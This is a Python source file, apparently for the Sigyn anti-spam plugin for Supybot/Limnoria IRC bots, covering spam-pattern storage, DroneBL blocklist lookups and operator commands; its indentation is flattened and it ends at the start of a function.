# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
# coding: utf-8
import os
import re
import sys
import time
import requests
from urllib.parse import urlencode
import sqlite3
import http.client
import threading
import dns.resolver
import json
import ipaddress
import random
import supybot.log as log
import supybot.conf as conf
import supybot.utils as utils
import supybot.ircdb as ircdb
import supybot.world as world
from supybot.commands import *
import supybot.ircmsgs as ircmsgs
import supybot.plugins as plugins
import supybot.commands as commands
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
import supybot.schedule as schedule
import supybot.registry as registry
from ftfy.badness import sequence_weirdness
from ftfy.badness import text_cost
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('Sigyn')
except:
_ = lambda x:x
def repetitions(s):
# returns a list of (pattern,count), used to detect a repeated pattern inside a single string.
r = re.compile(r"(.+?)\1+")
for match in r.finditer(s):
yield (match.group(1), len(match.group(0))/len(match.group(1)))
def isCloaked (prefix,sig):
if sig.registryValue('useWhoWas'):
return False
if not ircutils.isUserHostmask(prefix):
return False
(nick,ident,host) = ircutils.splitHostmask(prefix)
if '/' in host:
if host.startswith('gateway/') or host.startswith('nat/'):
return False
return True
return False
def compareString (a,b):
"""return 0 to 1 float percent of similarity ( 0.85 seems to be a good average )"""
if a == b:
return 1
sa, sb = set(a), set(b)
n = len(sa.intersection(sb))
if float(len(sa) + len(sb) - n) == 0:
return 0
jacc = n / float(len(sa) + len(sb) - n)
return jacc
def largestString (s1,s2):
"""return largest pattern available in 2 strings"""
# From https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Longest_common_substring#Python2
# License: CC BY-SA
m = [[0] * (1 + len(s2)) for i in range(1 + len(s1))]
longest, x_longest = 0, 0
for x in range(1, 1 + len(s1)):
for y in range(1, 1 + len(s2)):
if s1[x - 1] == s2[y - 1]:
m[x][y] = m[x - 1][y - 1] + 1
if m[x][y] > longest:
longest = m[x][y]
x_longest = x
else:
m[x][y] = 0
return s1[x_longest - longest: x_longest]
def floatToGMT (t):
f = None
try:
f = float(t)
except:
return None
return time.strftime('%Y-%m-%d %H:%M:%S GMT',time.gmtime(f))
def _getRe(f):
def get(irc, msg, args, state):
original = args[:]
s = args.pop(0)
def isRe(s):
try:
foo = f(s)
return True
except ValueError:
return False
try:
while len(s) < 512 and not isRe(s):
s += ' ' + args.pop(0)
if len(s) < 512:
state.args.append([s,f(s)])
else:
state.errorInvalid('regular expression', s)
except IndexError:
args[:] = original
state.errorInvalid('regular expression', s)
return get
getPatternAndMatcher = _getRe(utils.str.perlReToPythonRe)
addConverter('getPatternAndMatcher', getPatternAndMatcher)
class Ircd (object):
__slots__ = ('irc', 'channels','whowas','klines','queues','opered','defcon','pending','logs','limits','netsplit','ping','servers','resolving','stats','patterns','throttled','lastDefcon','god','mx','tokline','toklineresults','dlines', 'invites', 'nicks', 'domains', 'cleandomains', 'ilines', 'klinednicks', 'lastKlineOper')
def __init__(self,irc):
self.irc = irc
# contains Chan instances
self.channels = {}
# contains Pattern instances
self.patterns = {}
# contains whowas requested for a short period of time
self.whowas = {}
# contains klines requested for a short period of time
self.klines = {}
# contains various TimeoutQueue for detection purpose
# often it's [host] { with various TimeOutQueue and others elements }
self.queues = {}
# flag or time
self.opered = False
# flag or time
self.defcon = False
# used for temporary storage of outgoing actions
self.pending = {}
self.logs = {}
# contains servers notices when full or in bad state
# [servername] = time.time()
self.limits = {}
# flag or time
self.netsplit = time.time() + 300
self.ping = None
self.servers = {}
self.resolving = {}
self.stats = {}
self.ilines = {}
self.throttled = False
self.lastDefcon = False
self.god = False
self.mx = {}
self.tokline = {}
self.toklineresults = {}
self.dlines = []
self.invites = {}
self.nicks = {}
self.cleandomains = {}
self.klinednicks = utils.structures.TimeoutQueue(86400*2)
self.lastKlineOper = ''
def __repr__(self):
return '%s(patterns=%r, queues=%r, channels=%r, pending=%r, logs=%r, limits=%r, whowas=%r, klines=%r)' % (self.__class__.__name__,
self.patterns, self.queues, self.channels, self.pending, self.logs, self.limits, self.whowas, self.klines)
def restore (self,db):
c = db.cursor()
c.execute("""SELECT id, pattern, regexp, mini, life FROM patterns WHERE removed_at is NULL""")
items = c.fetchall()
if len(items):
for item in items:
(uid,pattern,regexp,limit,life) = item
regexp = int(regexp)
if regexp == 1:
regexp = True
else:
regexp = False
self.patterns[uid] = Pattern(uid,pattern,regexp,limit,life)
c.close()
def add (self,db,prefix,pattern,limit,life,regexp):
c = db.cursor()
t = 0
if regexp:
t = 1
c.execute("""INSERT INTO patterns VALUES (NULL, ?, ?, ?, ?, ?, ?, ?, ?, NULL, NULL)""", (pattern,t,limit,life,prefix,'',0,float(time.time())))
uid = int(c.lastrowid)
self.patterns[uid] = Pattern(uid,pattern,regexp,limit,life)
db.commit()
c.close()
return uid
def count(self,db,uid):
uid = int(uid)
if uid in self.patterns:
c = db.cursor()
c.execute("""SELECT id, triggered FROM patterns WHERE id=? LIMIT 1""",(uid,))
items = c.fetchall()
if len(items):
(uid,triggered) = items[0]
triggered = int(triggered + 1)
c.execute("""UPDATE patterns SET triggered=? WHERE id=?""",(triggered,uid))
db.commit()
c.close()
def ls (self,db,pattern,deep=False):
c = db.cursor()
glob = '*%s*' % pattern
like = '%'+pattern+'%'
i = None
try:
i = int(pattern)
except:
i = None
if i:
c.execute("""SELECT id, pattern, regexp, operator, at, triggered, removed_at, removed_by, comment, mini, life FROM patterns WHERE id=? LIMIT 1""",(i,))
else:
if deep:
c.execute("""SELECT id, pattern, regexp, operator, at, triggered, removed_at, removed_by, comment, mini, life FROM patterns WHERE id GLOB ? OR id LIKE ? OR pattern GLOB ? OR pattern LIKE ? OR comment GLOB ? OR comment LIKE ? ORDER BY id DESC""",(glob,like,glob,like,glob,like))
else:
c.execute("""SELECT id, pattern, regexp, operator, at, triggered, removed_at, removed_by, comment, mini, life FROM patterns WHERE (id GLOB ? OR id LIKE ? OR pattern GLOB ? OR pattern LIKE ? OR comment GLOB ? OR comment LIKE ?) and removed_at is NULL ORDER BY id DESC""",(glob,like,glob,like,glob,like))
items = c.fetchall()
c.close()
if len(items):
results = []
for item in items:
(uid,pattern,regexp,operator,at,triggered,removed_at,removed_by,comment,limit,life) = item
end = ''
if i:
if removed_by:
end = ' - disabled on %s by %s - ' % (floatToGMT(removed_at),removed_by.split('!')[0])
regexp = int(regexp)
reg = 'not case sensitive'
if regexp == 1:
reg = 'regexp pattern'
results.append('#%s "%s" by %s on %s (%s calls) %s/%ss%s %s - %s' % (uid,pattern,operator.split('!')[0],floatToGMT(at),triggered,limit,life,end,comment,reg))
else:
if removed_by:
end = ' (disabled)'
results.append('[#%s "%s" (%s calls) %s/%ss%s]' % (uid,pattern,triggered,limit,life,end))
return results
return []
def edit (self,db,uid,limit,life,comment):
c = db.cursor()
uid = int(uid)
c.execute("""SELECT id, life FROM patterns WHERE id=? LIMIT 1""",(uid,))
items = c.fetchall()
if len(items):
if comment:
c.execute("""UPDATE patterns SET life=?, mini=?, comment=? WHERE id=? LIMIT 1""",(life,limit,comment,uid))
else:
c.execute("""UPDATE patterns SET life=?, mini=? WHERE id=? LIMIT 1""",(life,limit,uid))
db.commit()
if uid in self.patterns:
self.patterns[uid].life = life
self.patterns[uid].limit = limit
found = True
c.close()
return (len(items))
def toggle (self,db,uid,prefix,active):
c = db.cursor()
uid = int(uid)
c.execute("""SELECT id, pattern, regexp, mini, life, removed_at, removed_by FROM patterns WHERE id=? LIMIT 1""",(uid,))
items = c.fetchall()
updated = False
if len(items):
(id,pattern,regexp,limit,life,removed_at,removed_by) = items[0]
regexp = int(regexp)
if active and removed_at:
c.execute("""UPDATE patterns SET removed_at=NULL, removed_by=NULL WHERE id=? LIMIT 1""",(uid,))
self.patterns[uid] = Pattern(uid,pattern,regexp == 1,limit,life)
updated = True
elif not removed_at and not active:
c.execute("""UPDATE patterns SET removed_at=?, removed_by=? WHERE id=? LIMIT 1""",(float(time.time()),prefix,uid))
if uid in self.patterns:
del self.patterns[uid]
updated = True
db.commit()
c.close()
return updated
def remove (self, db, uid):
c = db.cursor()
uid = int(uid)
c.execute("""SELECT id, pattern, regexp, mini, life, removed_at, removed_by FROM patterns WHERE id=? LIMIT 1""",(uid,))
items = c.fetchall()
updated = False
if len(items):
(id,pattern,regexp,limit,life,removed_at,removed_by) = items[0]
c.execute("""DELETE FROM patterns WHERE id=? LIMIT 1""",(uid,))
if not removed_at:
if uid in self.patterns:
del self.patterns[uid]
updated = True
db.commit()
c.close()
return updated
class Chan (object):
__slots__ = ('channel', 'patterns', 'buffers', 'logs', 'nicks', 'called', 'klines', 'requestedBySpam')
def __init__(self,channel):
self.channel = channel
self.patterns = None
self.buffers = {}
self.logs = {}
self.nicks = {}
self.called = False
self.klines = utils.structures.TimeoutQueue(1800)
self.requestedBySpam = False
def __repr__(self):
return '%s(channel=%r, patterns=%r, buffers=%r, logs=%r, nicks=%r)' % (self.__class__.__name__,
self.channel, self.patterns, self.buffers, self.logs, self.nicks)
class Pattern (object):
__slots__ = ('uid', 'pattern', 'limit', 'life', '_match')
def __init__(self,uid,pattern,regexp,limit,life):
self.uid = uid
self.pattern = pattern
self.limit = limit
self.life = life
self._match = False
if regexp:
self._match = utils.str.perlReToPythonRe(pattern)
else:
self.pattern = pattern.lower()
def match (self,text):
s = False
if isinstance(text,bytes):
text = str(text, "utf-8")
if self._match:
s = self._match.search (text) != None
else:
text = text.lower()
s = self.pattern in text
return s
def __repr__(self):
return '%s(uid=%r, pattern=%r, limit=%r, life=%r, _match=%r)' % (self.__class__.__name__,
self.uid, self.pattern, self.limit, self.life, self._match)
class Sigyn(callbacks.Plugin,plugins.ChannelDBHandler):
"""Network and Channels Spam protections"""
threaded = True
noIgnore = True
def __init__(self, irc):
callbacks.Plugin.__init__(self, irc)
plugins.ChannelDBHandler.__init__(self)
self._ircs = ircutils.IrcDict()
self.cache = {}
self.getIrc(irc)
self.starting = world.starting
self.recaps = re.compile("[A-Z]")
self.ipfiltered = {}
self.rmrequestors = {}
self.spamchars = {'Ḕ', 'Î', 'Ù', 'Ṋ', 'ℰ', 'Ừ', 'ś', 'ï', 'ℯ', 'ļ', 'ẋ', 'ᾒ', 'ἶ', 'ệ', 'ℓ', 'Ŋ', 'Ḝ', 'ξ', 'ṵ', 'û', 'ẻ', 'Ũ', 'ṡ', '§', 'Ƚ', 'Š', 'ᶙ', 'ṩ', '¹', 'ư', 'Ῐ', 'Ü', 'ŝ', 'ὴ', 'Ș', 'ũ', 'ῑ', 'ⱷ', 'Ǘ', 'Ɇ', 'ĭ', 'ἤ', 'Ɲ', 'Ǝ', 'ủ', 'µ', 'Ỵ', 'Ű', 'ū', 'į', 'ἳ', 'ΐ', 'ḝ', 'Ɛ', 'ṇ', 'È', 'ῆ', 'ử', 'Ň', 'υ', 'Ǜ', 'Ἔ', 'Ὑ', 'μ', 'Ļ', 'ů', 'Ɫ', 'ŷ', 'Ǚ', 'ἠ', 'Ĺ', 'Ę', 'Ὲ', 'Ẍ', 'Ɣ', 'Ϊ', 'ℇ', 'ẍ', 'ῧ', 'ϵ', 'ἦ', 'ừ', 'ṳ', 'ᾕ', 'ṋ', 'ù', 'ῦ', 'Ι', 'ῠ', 'ṥ', 'ὲ', 'ê', 'š', 'ě', 'ề', 'ẽ', 'ī', 'Ė', 'ỷ', 'Ủ', 'ḯ', 'Ἓ', 'Ὓ', 'Ş', 'ύ', 'Ṧ', 'Ŷ', 'ἒ', 'ἵ', 'ė', 'ἰ', 'ẹ', 'Ȇ', 'Ɏ', 'Ί', 'ὶ', 'Ε', 'ḛ', 'Ὤ', 'ǐ', 'ȇ', 'ἢ', 'í', 'ȕ', 'Ữ', '$', 'ή', 'Ṡ', 'ἷ', 'Ḙ', 'Ὢ', 'Ṉ', 'Ľ', 'ῃ', 'Ụ', 'Ṇ', 'ᾐ', 'Ů', 'Ἕ', 'ý', 'Ȅ', 'ᴌ', 'ύ', 'ņ', 'ὒ', 'Ý', 'ế', 'ĩ', 'ǘ', 'Ē', 'ṹ', 'Ư', 'é', 'Ÿ', 'ΰ', 'Ὦ', 'Ë', 'ỳ', 'ἓ', 'ĕ', 'ἑ', 'ṅ', 'ȗ', 'Ν', 'ί', 'ể', 'ᴟ', 'è', 'ᴇ', 'ḭ', 'ȝ', 'ϊ', 'ƪ', 'Ὗ', 'Ų', 'Ề', 'Ṷ', 'ü', 'Ɨ', 'Ώ', 'ň', 'ṷ', 'ƞ', 'Ȗ', 'ș', 'ῒ', 'Ś', 'Ự', 'Ń', 'Ἳ', 'Ứ', 'Ἷ', 'ἱ', 'ᾔ', 'ÿ', 'Ẽ', 'ὖ', 'ὑ', 'ἧ', 'Ὥ', 'ṉ', 'Ὠ', 'ℒ', 'Ệ', 'Ὼ', 'Ẻ', 'ḙ', 'Ŭ', '₴', 'Ὡ', 'ȉ', 'Ṅ', 'ᵪ', 'ữ', 'Ὧ', 'ń', 'Ἐ', 'Ú', 'ɏ', 'î', 'Ⱡ', 'Ƨ', 'Ě', 'ȿ', 'ᴉ', 'Ṩ', 'Ê', 'ȅ', 'ᶊ', 'Ṻ', 'Ḗ', 'ǹ', 'ᴣ', 'ş', 'Ï', 'ᾗ', 'ự', 'ὗ', 'ǔ', 'ᶓ', 'Ǹ', 'Ἶ', 'Ṳ', 'Ʊ', 'ṻ', 'Ǐ', 'ᵴ', 'ῇ', 'Ẹ', 'Ế', 'Ϋ', 'Ū', 'Ῑ', 'ί', 'ỹ', 'Ḯ', 'ǀ', 'Ὣ', 'Ȳ', 'ǃ', 'ų', 'ϴ', 'Ώ', 'Í', 'ì', 'ι', 'ῄ', 'ΰ', 'ἣ', 'ῡ', 'Ἒ', 'Ḽ', 'Ȉ', 'Έ', 'ἴ', 'ᶇ', 'ἕ', 'ǚ', 'Ī', 'Έ', '¥', 'Ṵ', 'ὔ', 'Ŝ', 'ῢ', 'Ἱ', 'ű', 'Ḷ', 'Ὶ', 'ḗ', 'ᴜ', 'ę', 'ὐ', 'Û', 'ᾑ', 'Ʋ', 'Ἑ', 'Ì', 'ŋ', 'Ḛ', 'ỵ', 'Ễ', '℮', '×', 'Ῠ', 'Ἵ', 'Ύ', 'Ử', 'ᴈ', 'ē', 'Ἰ', 'ᶖ', 'ȳ', 'Ǯ', 'ὓ', 'ὕ', 'ῂ', 'Ĕ', 'É', 'ᾓ', 'Ḻ', 'Ņ', 'ἥ', 'ḕ', 'ὺ', 'Ȋ', 'ı', 'Ȕ', 'ṧ', 'ᾖ', 'Ί', 'ΐ', '€', 'Ḭ', 'Ƴ', 'ȵ', 'Ṹ', 'Ñ', 'Ƞ', 'Ȩ', 'ῐ', 'ứ', 'έ', 'ł', 'ŭ', '϶', 'ƴ', '₤', 'ƨ', '£', 'Ł', 'ñ', 'ë', 'ễ', 'ǯ', 'ᶕ', 'ή', 'ᶔ', 'Π', 'ȩ', 'ἐ', 'Ể', 'ε', 'Ĩ', 'ǜ', 'Į', 'Ξ', 'Ḹ', 'Ῡ', '∩', 'ú', 'Χ', 'ụ'}
def removeDnsbl (self,irc,ip,droneblHost,droneblKey):
headers = {
'Content-Type' : 'text/xml'
}
def check(answer):
found = False
for line in answer.split('\n'):
if line.find('listed="1"') != -1:
id = line.split('id="')[1]
id = id.split('"')[0]
if line.find('type="18"') != -1:
self.logChannel(irc,'RMDNSBL: %s (%s) not removed: is type 18' % (ip,id))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) not removed: is type 18' % (ip,id)))
del self.rmrequestors[ip]
continue
data = "<?xml version=\"1.0\"?><request key='"+droneblKey+"'><remove id='"+id+"' /></request>"
found = True
try:
r = requests.post(droneblHost,data=data,headers=headers)
response = r.text.replace('\n','')
if "You are not authorized to remove this incident" in response:
self.logChannel(irc,'RMDNSBL: %s (%s) failed: You are not authorized to remove this incident' % (ip,id))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) not removed: You are not authorized to remove this incident' % (ip,id)))
del self.rmrequestors[ip]
else:
self.logChannel(irc,'RMDNSBL: %s (%s) removed' % (ip,id))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) removed' % (ip,id)))
del self.rmrequestors[ip]
except:
self.logChannel(irc,'RMDNSBL: %s (%s) failed: unknown error' % (ip,id))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) not removed: unknown error' % (ip,id)))
del self.rmrequestors[ip]
if not found:
self.logChannel(irc,'RMDNSBL: %s (none) not removed: no listing found' % ip)
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) not removed: no listing found' % (ip,id)))
del self.rmrequestors[ip]
data = "<?xml version=\"1.0\"?><request key='"+droneblKey+"'><lookup ip='"+ip+"' /></request>"
r = requests.post(droneblHost,data=data,headers=headers)
if r.status_code == 200:
check(r.text)
else:
self.logChannel(irc,'RMDNSBL: %s (unknown) failed: status code %s' % (ip,r.status_code))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (unknown) not removed: status code %s' % (ip,r.status_code)))
def fillDnsbl (self,irc,ip,droneblHost,droneblKey,comment=None):
headers = {
'Content-Type' : 'text/xml'
}
def check(answer):
self.log.info ('fillDnsbl, answered %s' % ip)
if 'listed="1"' in answer:
self.logChannel(irc,'DNSBL: %s (already listed)' % ip)
return
type = 3
if comment == 'Bottler':
type = 5
elif comment == 'Unknown spambot or drone':
type = 6
elif comment == 'DDOS Drone':
type = 7
elif comment == 'SOCKS Proxy':
type = 8
elif comment == 'HTTP Proxy':
type = 9
elif comment == 'ProxyChain':
type = 10
elif comment == 'Web Page Proxy':
type = 11
elif comment == 'Open DNS Resolver':
type = 12
elif comment == 'Brute force attackers':
type = 13
elif comment == 'Open Wingate Proxy':
type = 14
elif comment == 'Compromised router / gateway':
type = 15
elif comment == 'Autorooting worms':
type = 16
elif comment == 'Automatically determined botnet IPs (experimental)':
type = 17
elif comment == 'DNS/MX type hostname detected on IRC':
type = 18
elif comment == "Abused VPN Service":
type = 19
data = "<?xml version=\"1.0\"?><request key='"+droneblKey+"'><add ip='"+ip+"' type='"+str(type)+"' comment='used by irc spam bot' /></request>"
r = requests.post(droneblHost,data=data,headers=headers)
if r.status_code != 200:
self.logChannel(irc,'DNSBL: %s (add returned %s %s)' % (ip,r.status_code,r.reason))
if comment:
self.logChannel(irc,'DNSBL: %s (%s,type:%s)' % (ip,comment,type))
else:
self.logChannel(irc,'DNSBL: %s' % ip)
self.log.info('fillDnsbl, checking %s' % ip)
data = "<?xml version=\"1.0\"?><request key='"+droneblKey+"'><lookup ip='"+ip+"' /></request>"
try:
r = requests.post(droneblHost,data=data,headers=headers,timeout=9)
if r.status_code == 200:
check(r.text)
else:
self.logChannel(irc,'DNSBL: %s (%s)' % (ip,r.status_code))
except requests.exceptions.RequestException as e:
self.logChannel(irc,'DNSBL: %s (%s)' % (ip,e))
def state (self,irc,msg,args,channel):
"""[<channel>]
returns state of the plugin, for optional <channel>"""
self.cleanup(irc)
i = self.getIrc(irc)
if not channel:
irc.queueMsg(ircmsgs.privmsg(msg.nick,'Opered %s, enable %s, defcon %s, netsplit %s' % (i.opered,self.registryValue('enable'),(i.defcon),i.netsplit)))
irc.queueMsg(ircmsgs.privmsg(msg.nick,'There are %s permanent patterns and %s channels directly monitored' % (len(i.patterns),len(i.channels))))
channels = 0
prefixs = 0
for k in i.queues:
if irc.isChannel(k):
channels += 1
elif ircutils.isUserHostmask(k):
prefixs += 1
irc.queueMsg(ircmsgs.privmsg(msg.nick,"Via server's notices: %s channels and %s users monitored" % (channels,prefixs)))
for chan in i.channels:
if channel == chan:
ch = self.getChan(irc,chan)
if not self.registryValue('ignoreChannel',channel=chan):
called = ""
if ch.called:
called = 'currently in defcon'
irc.queueMsg(ircmsgs.privmsg(msg.nick,'On %s (%s users) %s:' % (chan,len(ch.nicks),called)))
protections = ['flood','lowFlood','repeat','lowRepeat','massRepeat','lowMassRepeat','hilight','nick','ctcp']
for protection in protections:
if self.registryValue('%sPermit' % protection,channel=chan) > -1:
permit = self.registryValue('%sPermit' % protection,channel=chan)
life = self.registryValue('%sLife' % protection,channel=chan)
abuse = self.hasAbuseOnChannel(irc,chan,protection)
if abuse:
abuse = ' (ongoing abuses) '
else:
abuse = ''
count = 0
if protection == 'repeat':
for b in ch.buffers:
if ircutils.isUserHostmask('n!%s' % b):
count += 1
else:
for b in ch.buffers:
if protection in b:
count += len(ch.buffers[b])
if count:
count = " - %s user's buffers" % count
else:
count = ""
irc.queueMsg(ircmsgs.privmsg(msg.nick," - %s : %s/%ss %s%s" % (protection,permit,life,abuse,count)))
irc.replySuccess()
state = wrap(state,['owner',optional('channel')])
def defcon (self,irc,msg,args,channel):
"""[<channel>]
limits are lowered, globally or for a specific <channel>"""
i = self.getIrc(irc)
if channel and channel != self.registryValue('logChannel'):
if channel in i.channels and self.registryValue('abuseDuration',channel=channel) > 0:
chan = self.getChan(irc,channel)
if chan.called:
self.logChannel(irc,'INFO: [%s] rescheduled ignores lifted, limits lowered (by %s) for %ss' % (channel,msg.nick,self.registryValue('abuseDuration',channel=channel)))
chan.called = time.time()
else:
self.logChannel(irc,'INFO: [%s] ignores lifted, limits lowered (by %s) for %ss' % (channel,msg.nick,self.registryValue('abuseDuration',channel=channel)))
chan.called = time.time()
else:
if i.defcon:
i.defcon = time.time()
irc.reply('Already in defcon mode, reset, %ss more' % self.registryValue('defcon'))
else:
i.defcon = time.time()
self.logChannel(irc,"INFO: ignores lifted and abuses end to klines for %ss by %s" % (self.registryValue('defcon'),msg.nick))
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
self.applyDefcon (irc)
irc.replySuccess()
defcon = wrap(defcon,['owner',optional('channel')])
def vacuum (self,irc,msg,args):
"""takes no arguments
VACUUM the permanent patterns's database"""
db = self.getDb(irc.network)
c = db.cursor()
c.execute('VACUUM')
c.close()
irc.replySuccess()
vacuum = wrap(vacuum,['owner'])
def leave (self,irc,msg,args,channel):
"""<channel>
force the bot to part <channel> and won't rejoin even if invited
"""
if channel in irc.state.channels:
reason = conf.supybot.plugins.channel.partMsg.getValue()
irc.queueMsg(ircmsgs.part(channel,reason))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().remove(channel)
except:
pass
self.setRegistryValue('lastActionTaken',-1.0,channel=channel)
irc.replySuccess()
leave = wrap(leave,['owner','channel'])
def stay (self,irc,msg,args,channel):
"""<channel>
force bot to stay in <channel>
"""
self.setRegistryValue('leaveChannelIfNoActivity',-1,channel=channel)
if not channel in irc.state.channels:
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
irc.queueMsg(ircmsgs.join(channel))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(channel)
except KeyError:
pass
irc.replySuccess()
stay = wrap(stay,['owner','channel'])
def isprotected (self,irc,msg,args,hostmask,channel):
"""<hostmask> [<channel>]
returns true if <hostmask> is protected, in optional <channel>"""
if ircdb.checkCapability(hostmask, 'protected'):
irc.reply('%s is globally protected' % hostmask)
else:
if channel:
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(hostmask, protected):
irc.reply('%s is protected in %s' % (hostmask,channel))
else:
irc.reply('%s is not protected in %s' % (hostmask,channel))
else:
irc.reply('%s is not protected' % hostmask);
isprotected = wrap(isprotected,['owner','hostmask',optional('channel')])
def checkactions (self,irc,msg,args,duration):
"""<duration> in days
return channels where last action taken is older than <duration>"""
channels = []
duration = duration * 24 * 3600
for channel in irc.state.channels:
if irc.isChannel(channel):
if self.registryValue('mainChannel') in channel or channel == self.registryValue('reportChannel') or self.registryValue('snoopChannel') == channel or self.registryValue('secretChannel') == channel:
continue
if self.registryValue('ignoreChannel',channel):
continue
action = self.registryValue('lastActionTaken',channel=channel)
if action > 0:
if time.time()-action > duration:
channels.append('%s: %s' % (channel,time.strftime('%Y-%m-%d %H:%M:%S GMT',time.gmtime(action))))
else:
channels.append(channel)
irc.replies(channels,None,None,False)
checkactions = wrap(checkactions,['owner','positiveInt'])
def netsplit (self,irc,msg,args,duration):
"""<duration>
entering netsplit mode for <duration> (in seconds)"""
i = self.getIrc(irc)
if i.netsplit:
i.netsplit = time.time()+duration
irc.reply('Already in netsplit mode, reset, %ss more' % duration)
else:
i.netsplit = time.time()+duration
self.logChannel(irc,"INFO: netsplit activated for %ss by %s: some abuses are ignored" % (duration,msg.nick))
irc.replySuccess()
netsplit = wrap(netsplit,['owner','positiveInt'])
def checkpattern (self,irc,msg,args,text):
""" <text>
returns permanents patterns triggered by <text>"""
i = self.getIrc(irc)
patterns = []
text = text.encode('utf-8').strip()
for k in i.patterns:
pattern = i.patterns[k]
if pattern.match(text):
patterns.append('#%s' % pattern.uid)
if len(patterns):
irc.queueMsg(ircmsgs.privmsg(msg.nick,'%s matches: %s' % (len(patterns),', '.join(patterns))))
else:
irc.reply('No matches')
checkpattern = wrap(checkpattern,['owner','text'])
def lspattern (self,irc,msg,args,optlist,pattern):
"""[--deep] <id|pattern>
returns patterns which matches pattern or info about pattern #id, use --deep to search on deactivated patterns, * to return all pattern"""
i = self.getIrc(irc)
deep = pattern == '*'
for (option, arg) in optlist:
if option == 'deep':
deep = True
results = i.ls(self.getDb(irc.network),pattern,deep)
if len(results):
if deep or pattern == '*':
for r in results:
irc.queueMsg(ircmsgs.privmsg(msg.nick,r))
else:
irc.replies(results,None,None,False)
else:
irc.reply('no pattern found')
lspattern = wrap(lspattern,['owner',getopts({'deep': ''}),'text'])
def rmpattern (self,irc,msg,args,ids):
"""<id> [<id>]
remove permanent pattern by id"""
i = self.getIrc(irc)
results = []
for id in ids:
result = i.remove(self.getDb(irc.network),id)
if result:
results.append('#%s' % id)
self.logChannel(irc,'PATTERN: %s deleted %s' % (msg.nick,','.join(results)))
irc.replySuccess()
rmpattern = wrap(rmpattern,['owner',many('positiveInt')])
def addpattern (self,irc,msg,args,limit,life,pattern):
"""<limit> <life> <pattern>
add a permanent <pattern> : kline after <limit> calls raised during <life> seconds,
for immediate kline use limit 0"""
i = self.getIrc(irc)
pattern = pattern.lower()
result = i.add(self.getDb(irc.network),msg.prefix,pattern,limit,life,False)
self.logChannel(irc,'PATTERN: %s added #%s : "%s" %s/%ss' % (msg.nick,result,pattern,limit,life))
irc.reply('#%s added' % result)
addpattern = wrap(addpattern,['owner','nonNegativeInt','positiveInt','text'])
def addregexpattern (self,irc,msg,args,limit,life,pattern):
"""<limit> <life> /<pattern>/
add a permanent /<pattern>/ to kline after <limit> calls raised during <life> seconds,
for immediate kline use limit 0"""
i = self.getIrc(irc)
result = i.add(self.getDb(irc.network),msg.prefix,pattern[0],limit,life,True)
self.logChannel(irc,'PATTERN: %s added #%s : "%s" %s/%ss' % (msg.nick,result,pattern[0],limit,life))
irc.reply('#%s added' % result)
addregexpattern = wrap(addregexpattern,['owner','nonNegativeInt','positiveInt','getPatternAndMatcher'])
def editpattern (self,irc,msg,args,uid,limit,life,comment):
"""<id> <limit> <life> [<comment>]
edit #<id> with new <limit> <life> and <comment>"""
i = self.getIrc(irc)
result = i.edit(self.getDb(irc.network),uid,limit,life,comment)
if result:
if comment:
self.logChannel(irc,'PATTERN: %s edited #%s with %s/%ss (%s)' % (msg.nick,uid,limit,life,comment))
else:
self.logChannel(irc,'PATTERN: %s edited #%s with %s/%ss' % (msg.nick,uid,limit,life))
irc.replySuccess()
else:
irc.reply("#%s doesn't exist")
editpattern = wrap(editpattern,['owner','positiveInt','nonNegativeInt','positiveInt',optional('text')])
def togglepattern (self,irc,msg,args,uid,toggle):
"""<id> <boolean>
activate or deactivate #<id>"""
i = self.getIrc(irc)
result = i.toggle(self.getDb(irc.network),uid,msg.prefix,toggle)
if result:
if toggle:
self.logChannel(irc,'PATTERN: %s enabled #%s' % (msg.nick,uid))
else:
self.logChannel(irc,'PATTERN: %s disabled #%s' % (msg.nick,uid))
irc.replySuccess()
else:
irc.reply("#%s doesn't exist or is already in requested state" % uid)
togglepattern = wrap(togglepattern,['owner','positiveInt','boolean'])
def lstmp (self,irc,msg,args,channel):
"""[<channel>]
returns temporary patterns for given channel"""
i = self.getIrc(irc)
if channel in i.channels:
chan = self.getChan(irc,channel)
if chan.patterns:
patterns = list(chan.patterns)
if len(patterns):
irc.reply('[%s] %s patterns : %s' % (channel,len(patterns),', '.join(patterns)))
else:
irc.reply('[%s] no active pattern' % channel)
else:
irc.reply('[%s] no active pattern' % channel)
else:
irc.reply('[%s] is unknown' % channel)
lstmp = wrap(lstmp,['op'])
def dnsblresolve (self,irc,msg,args,ips):
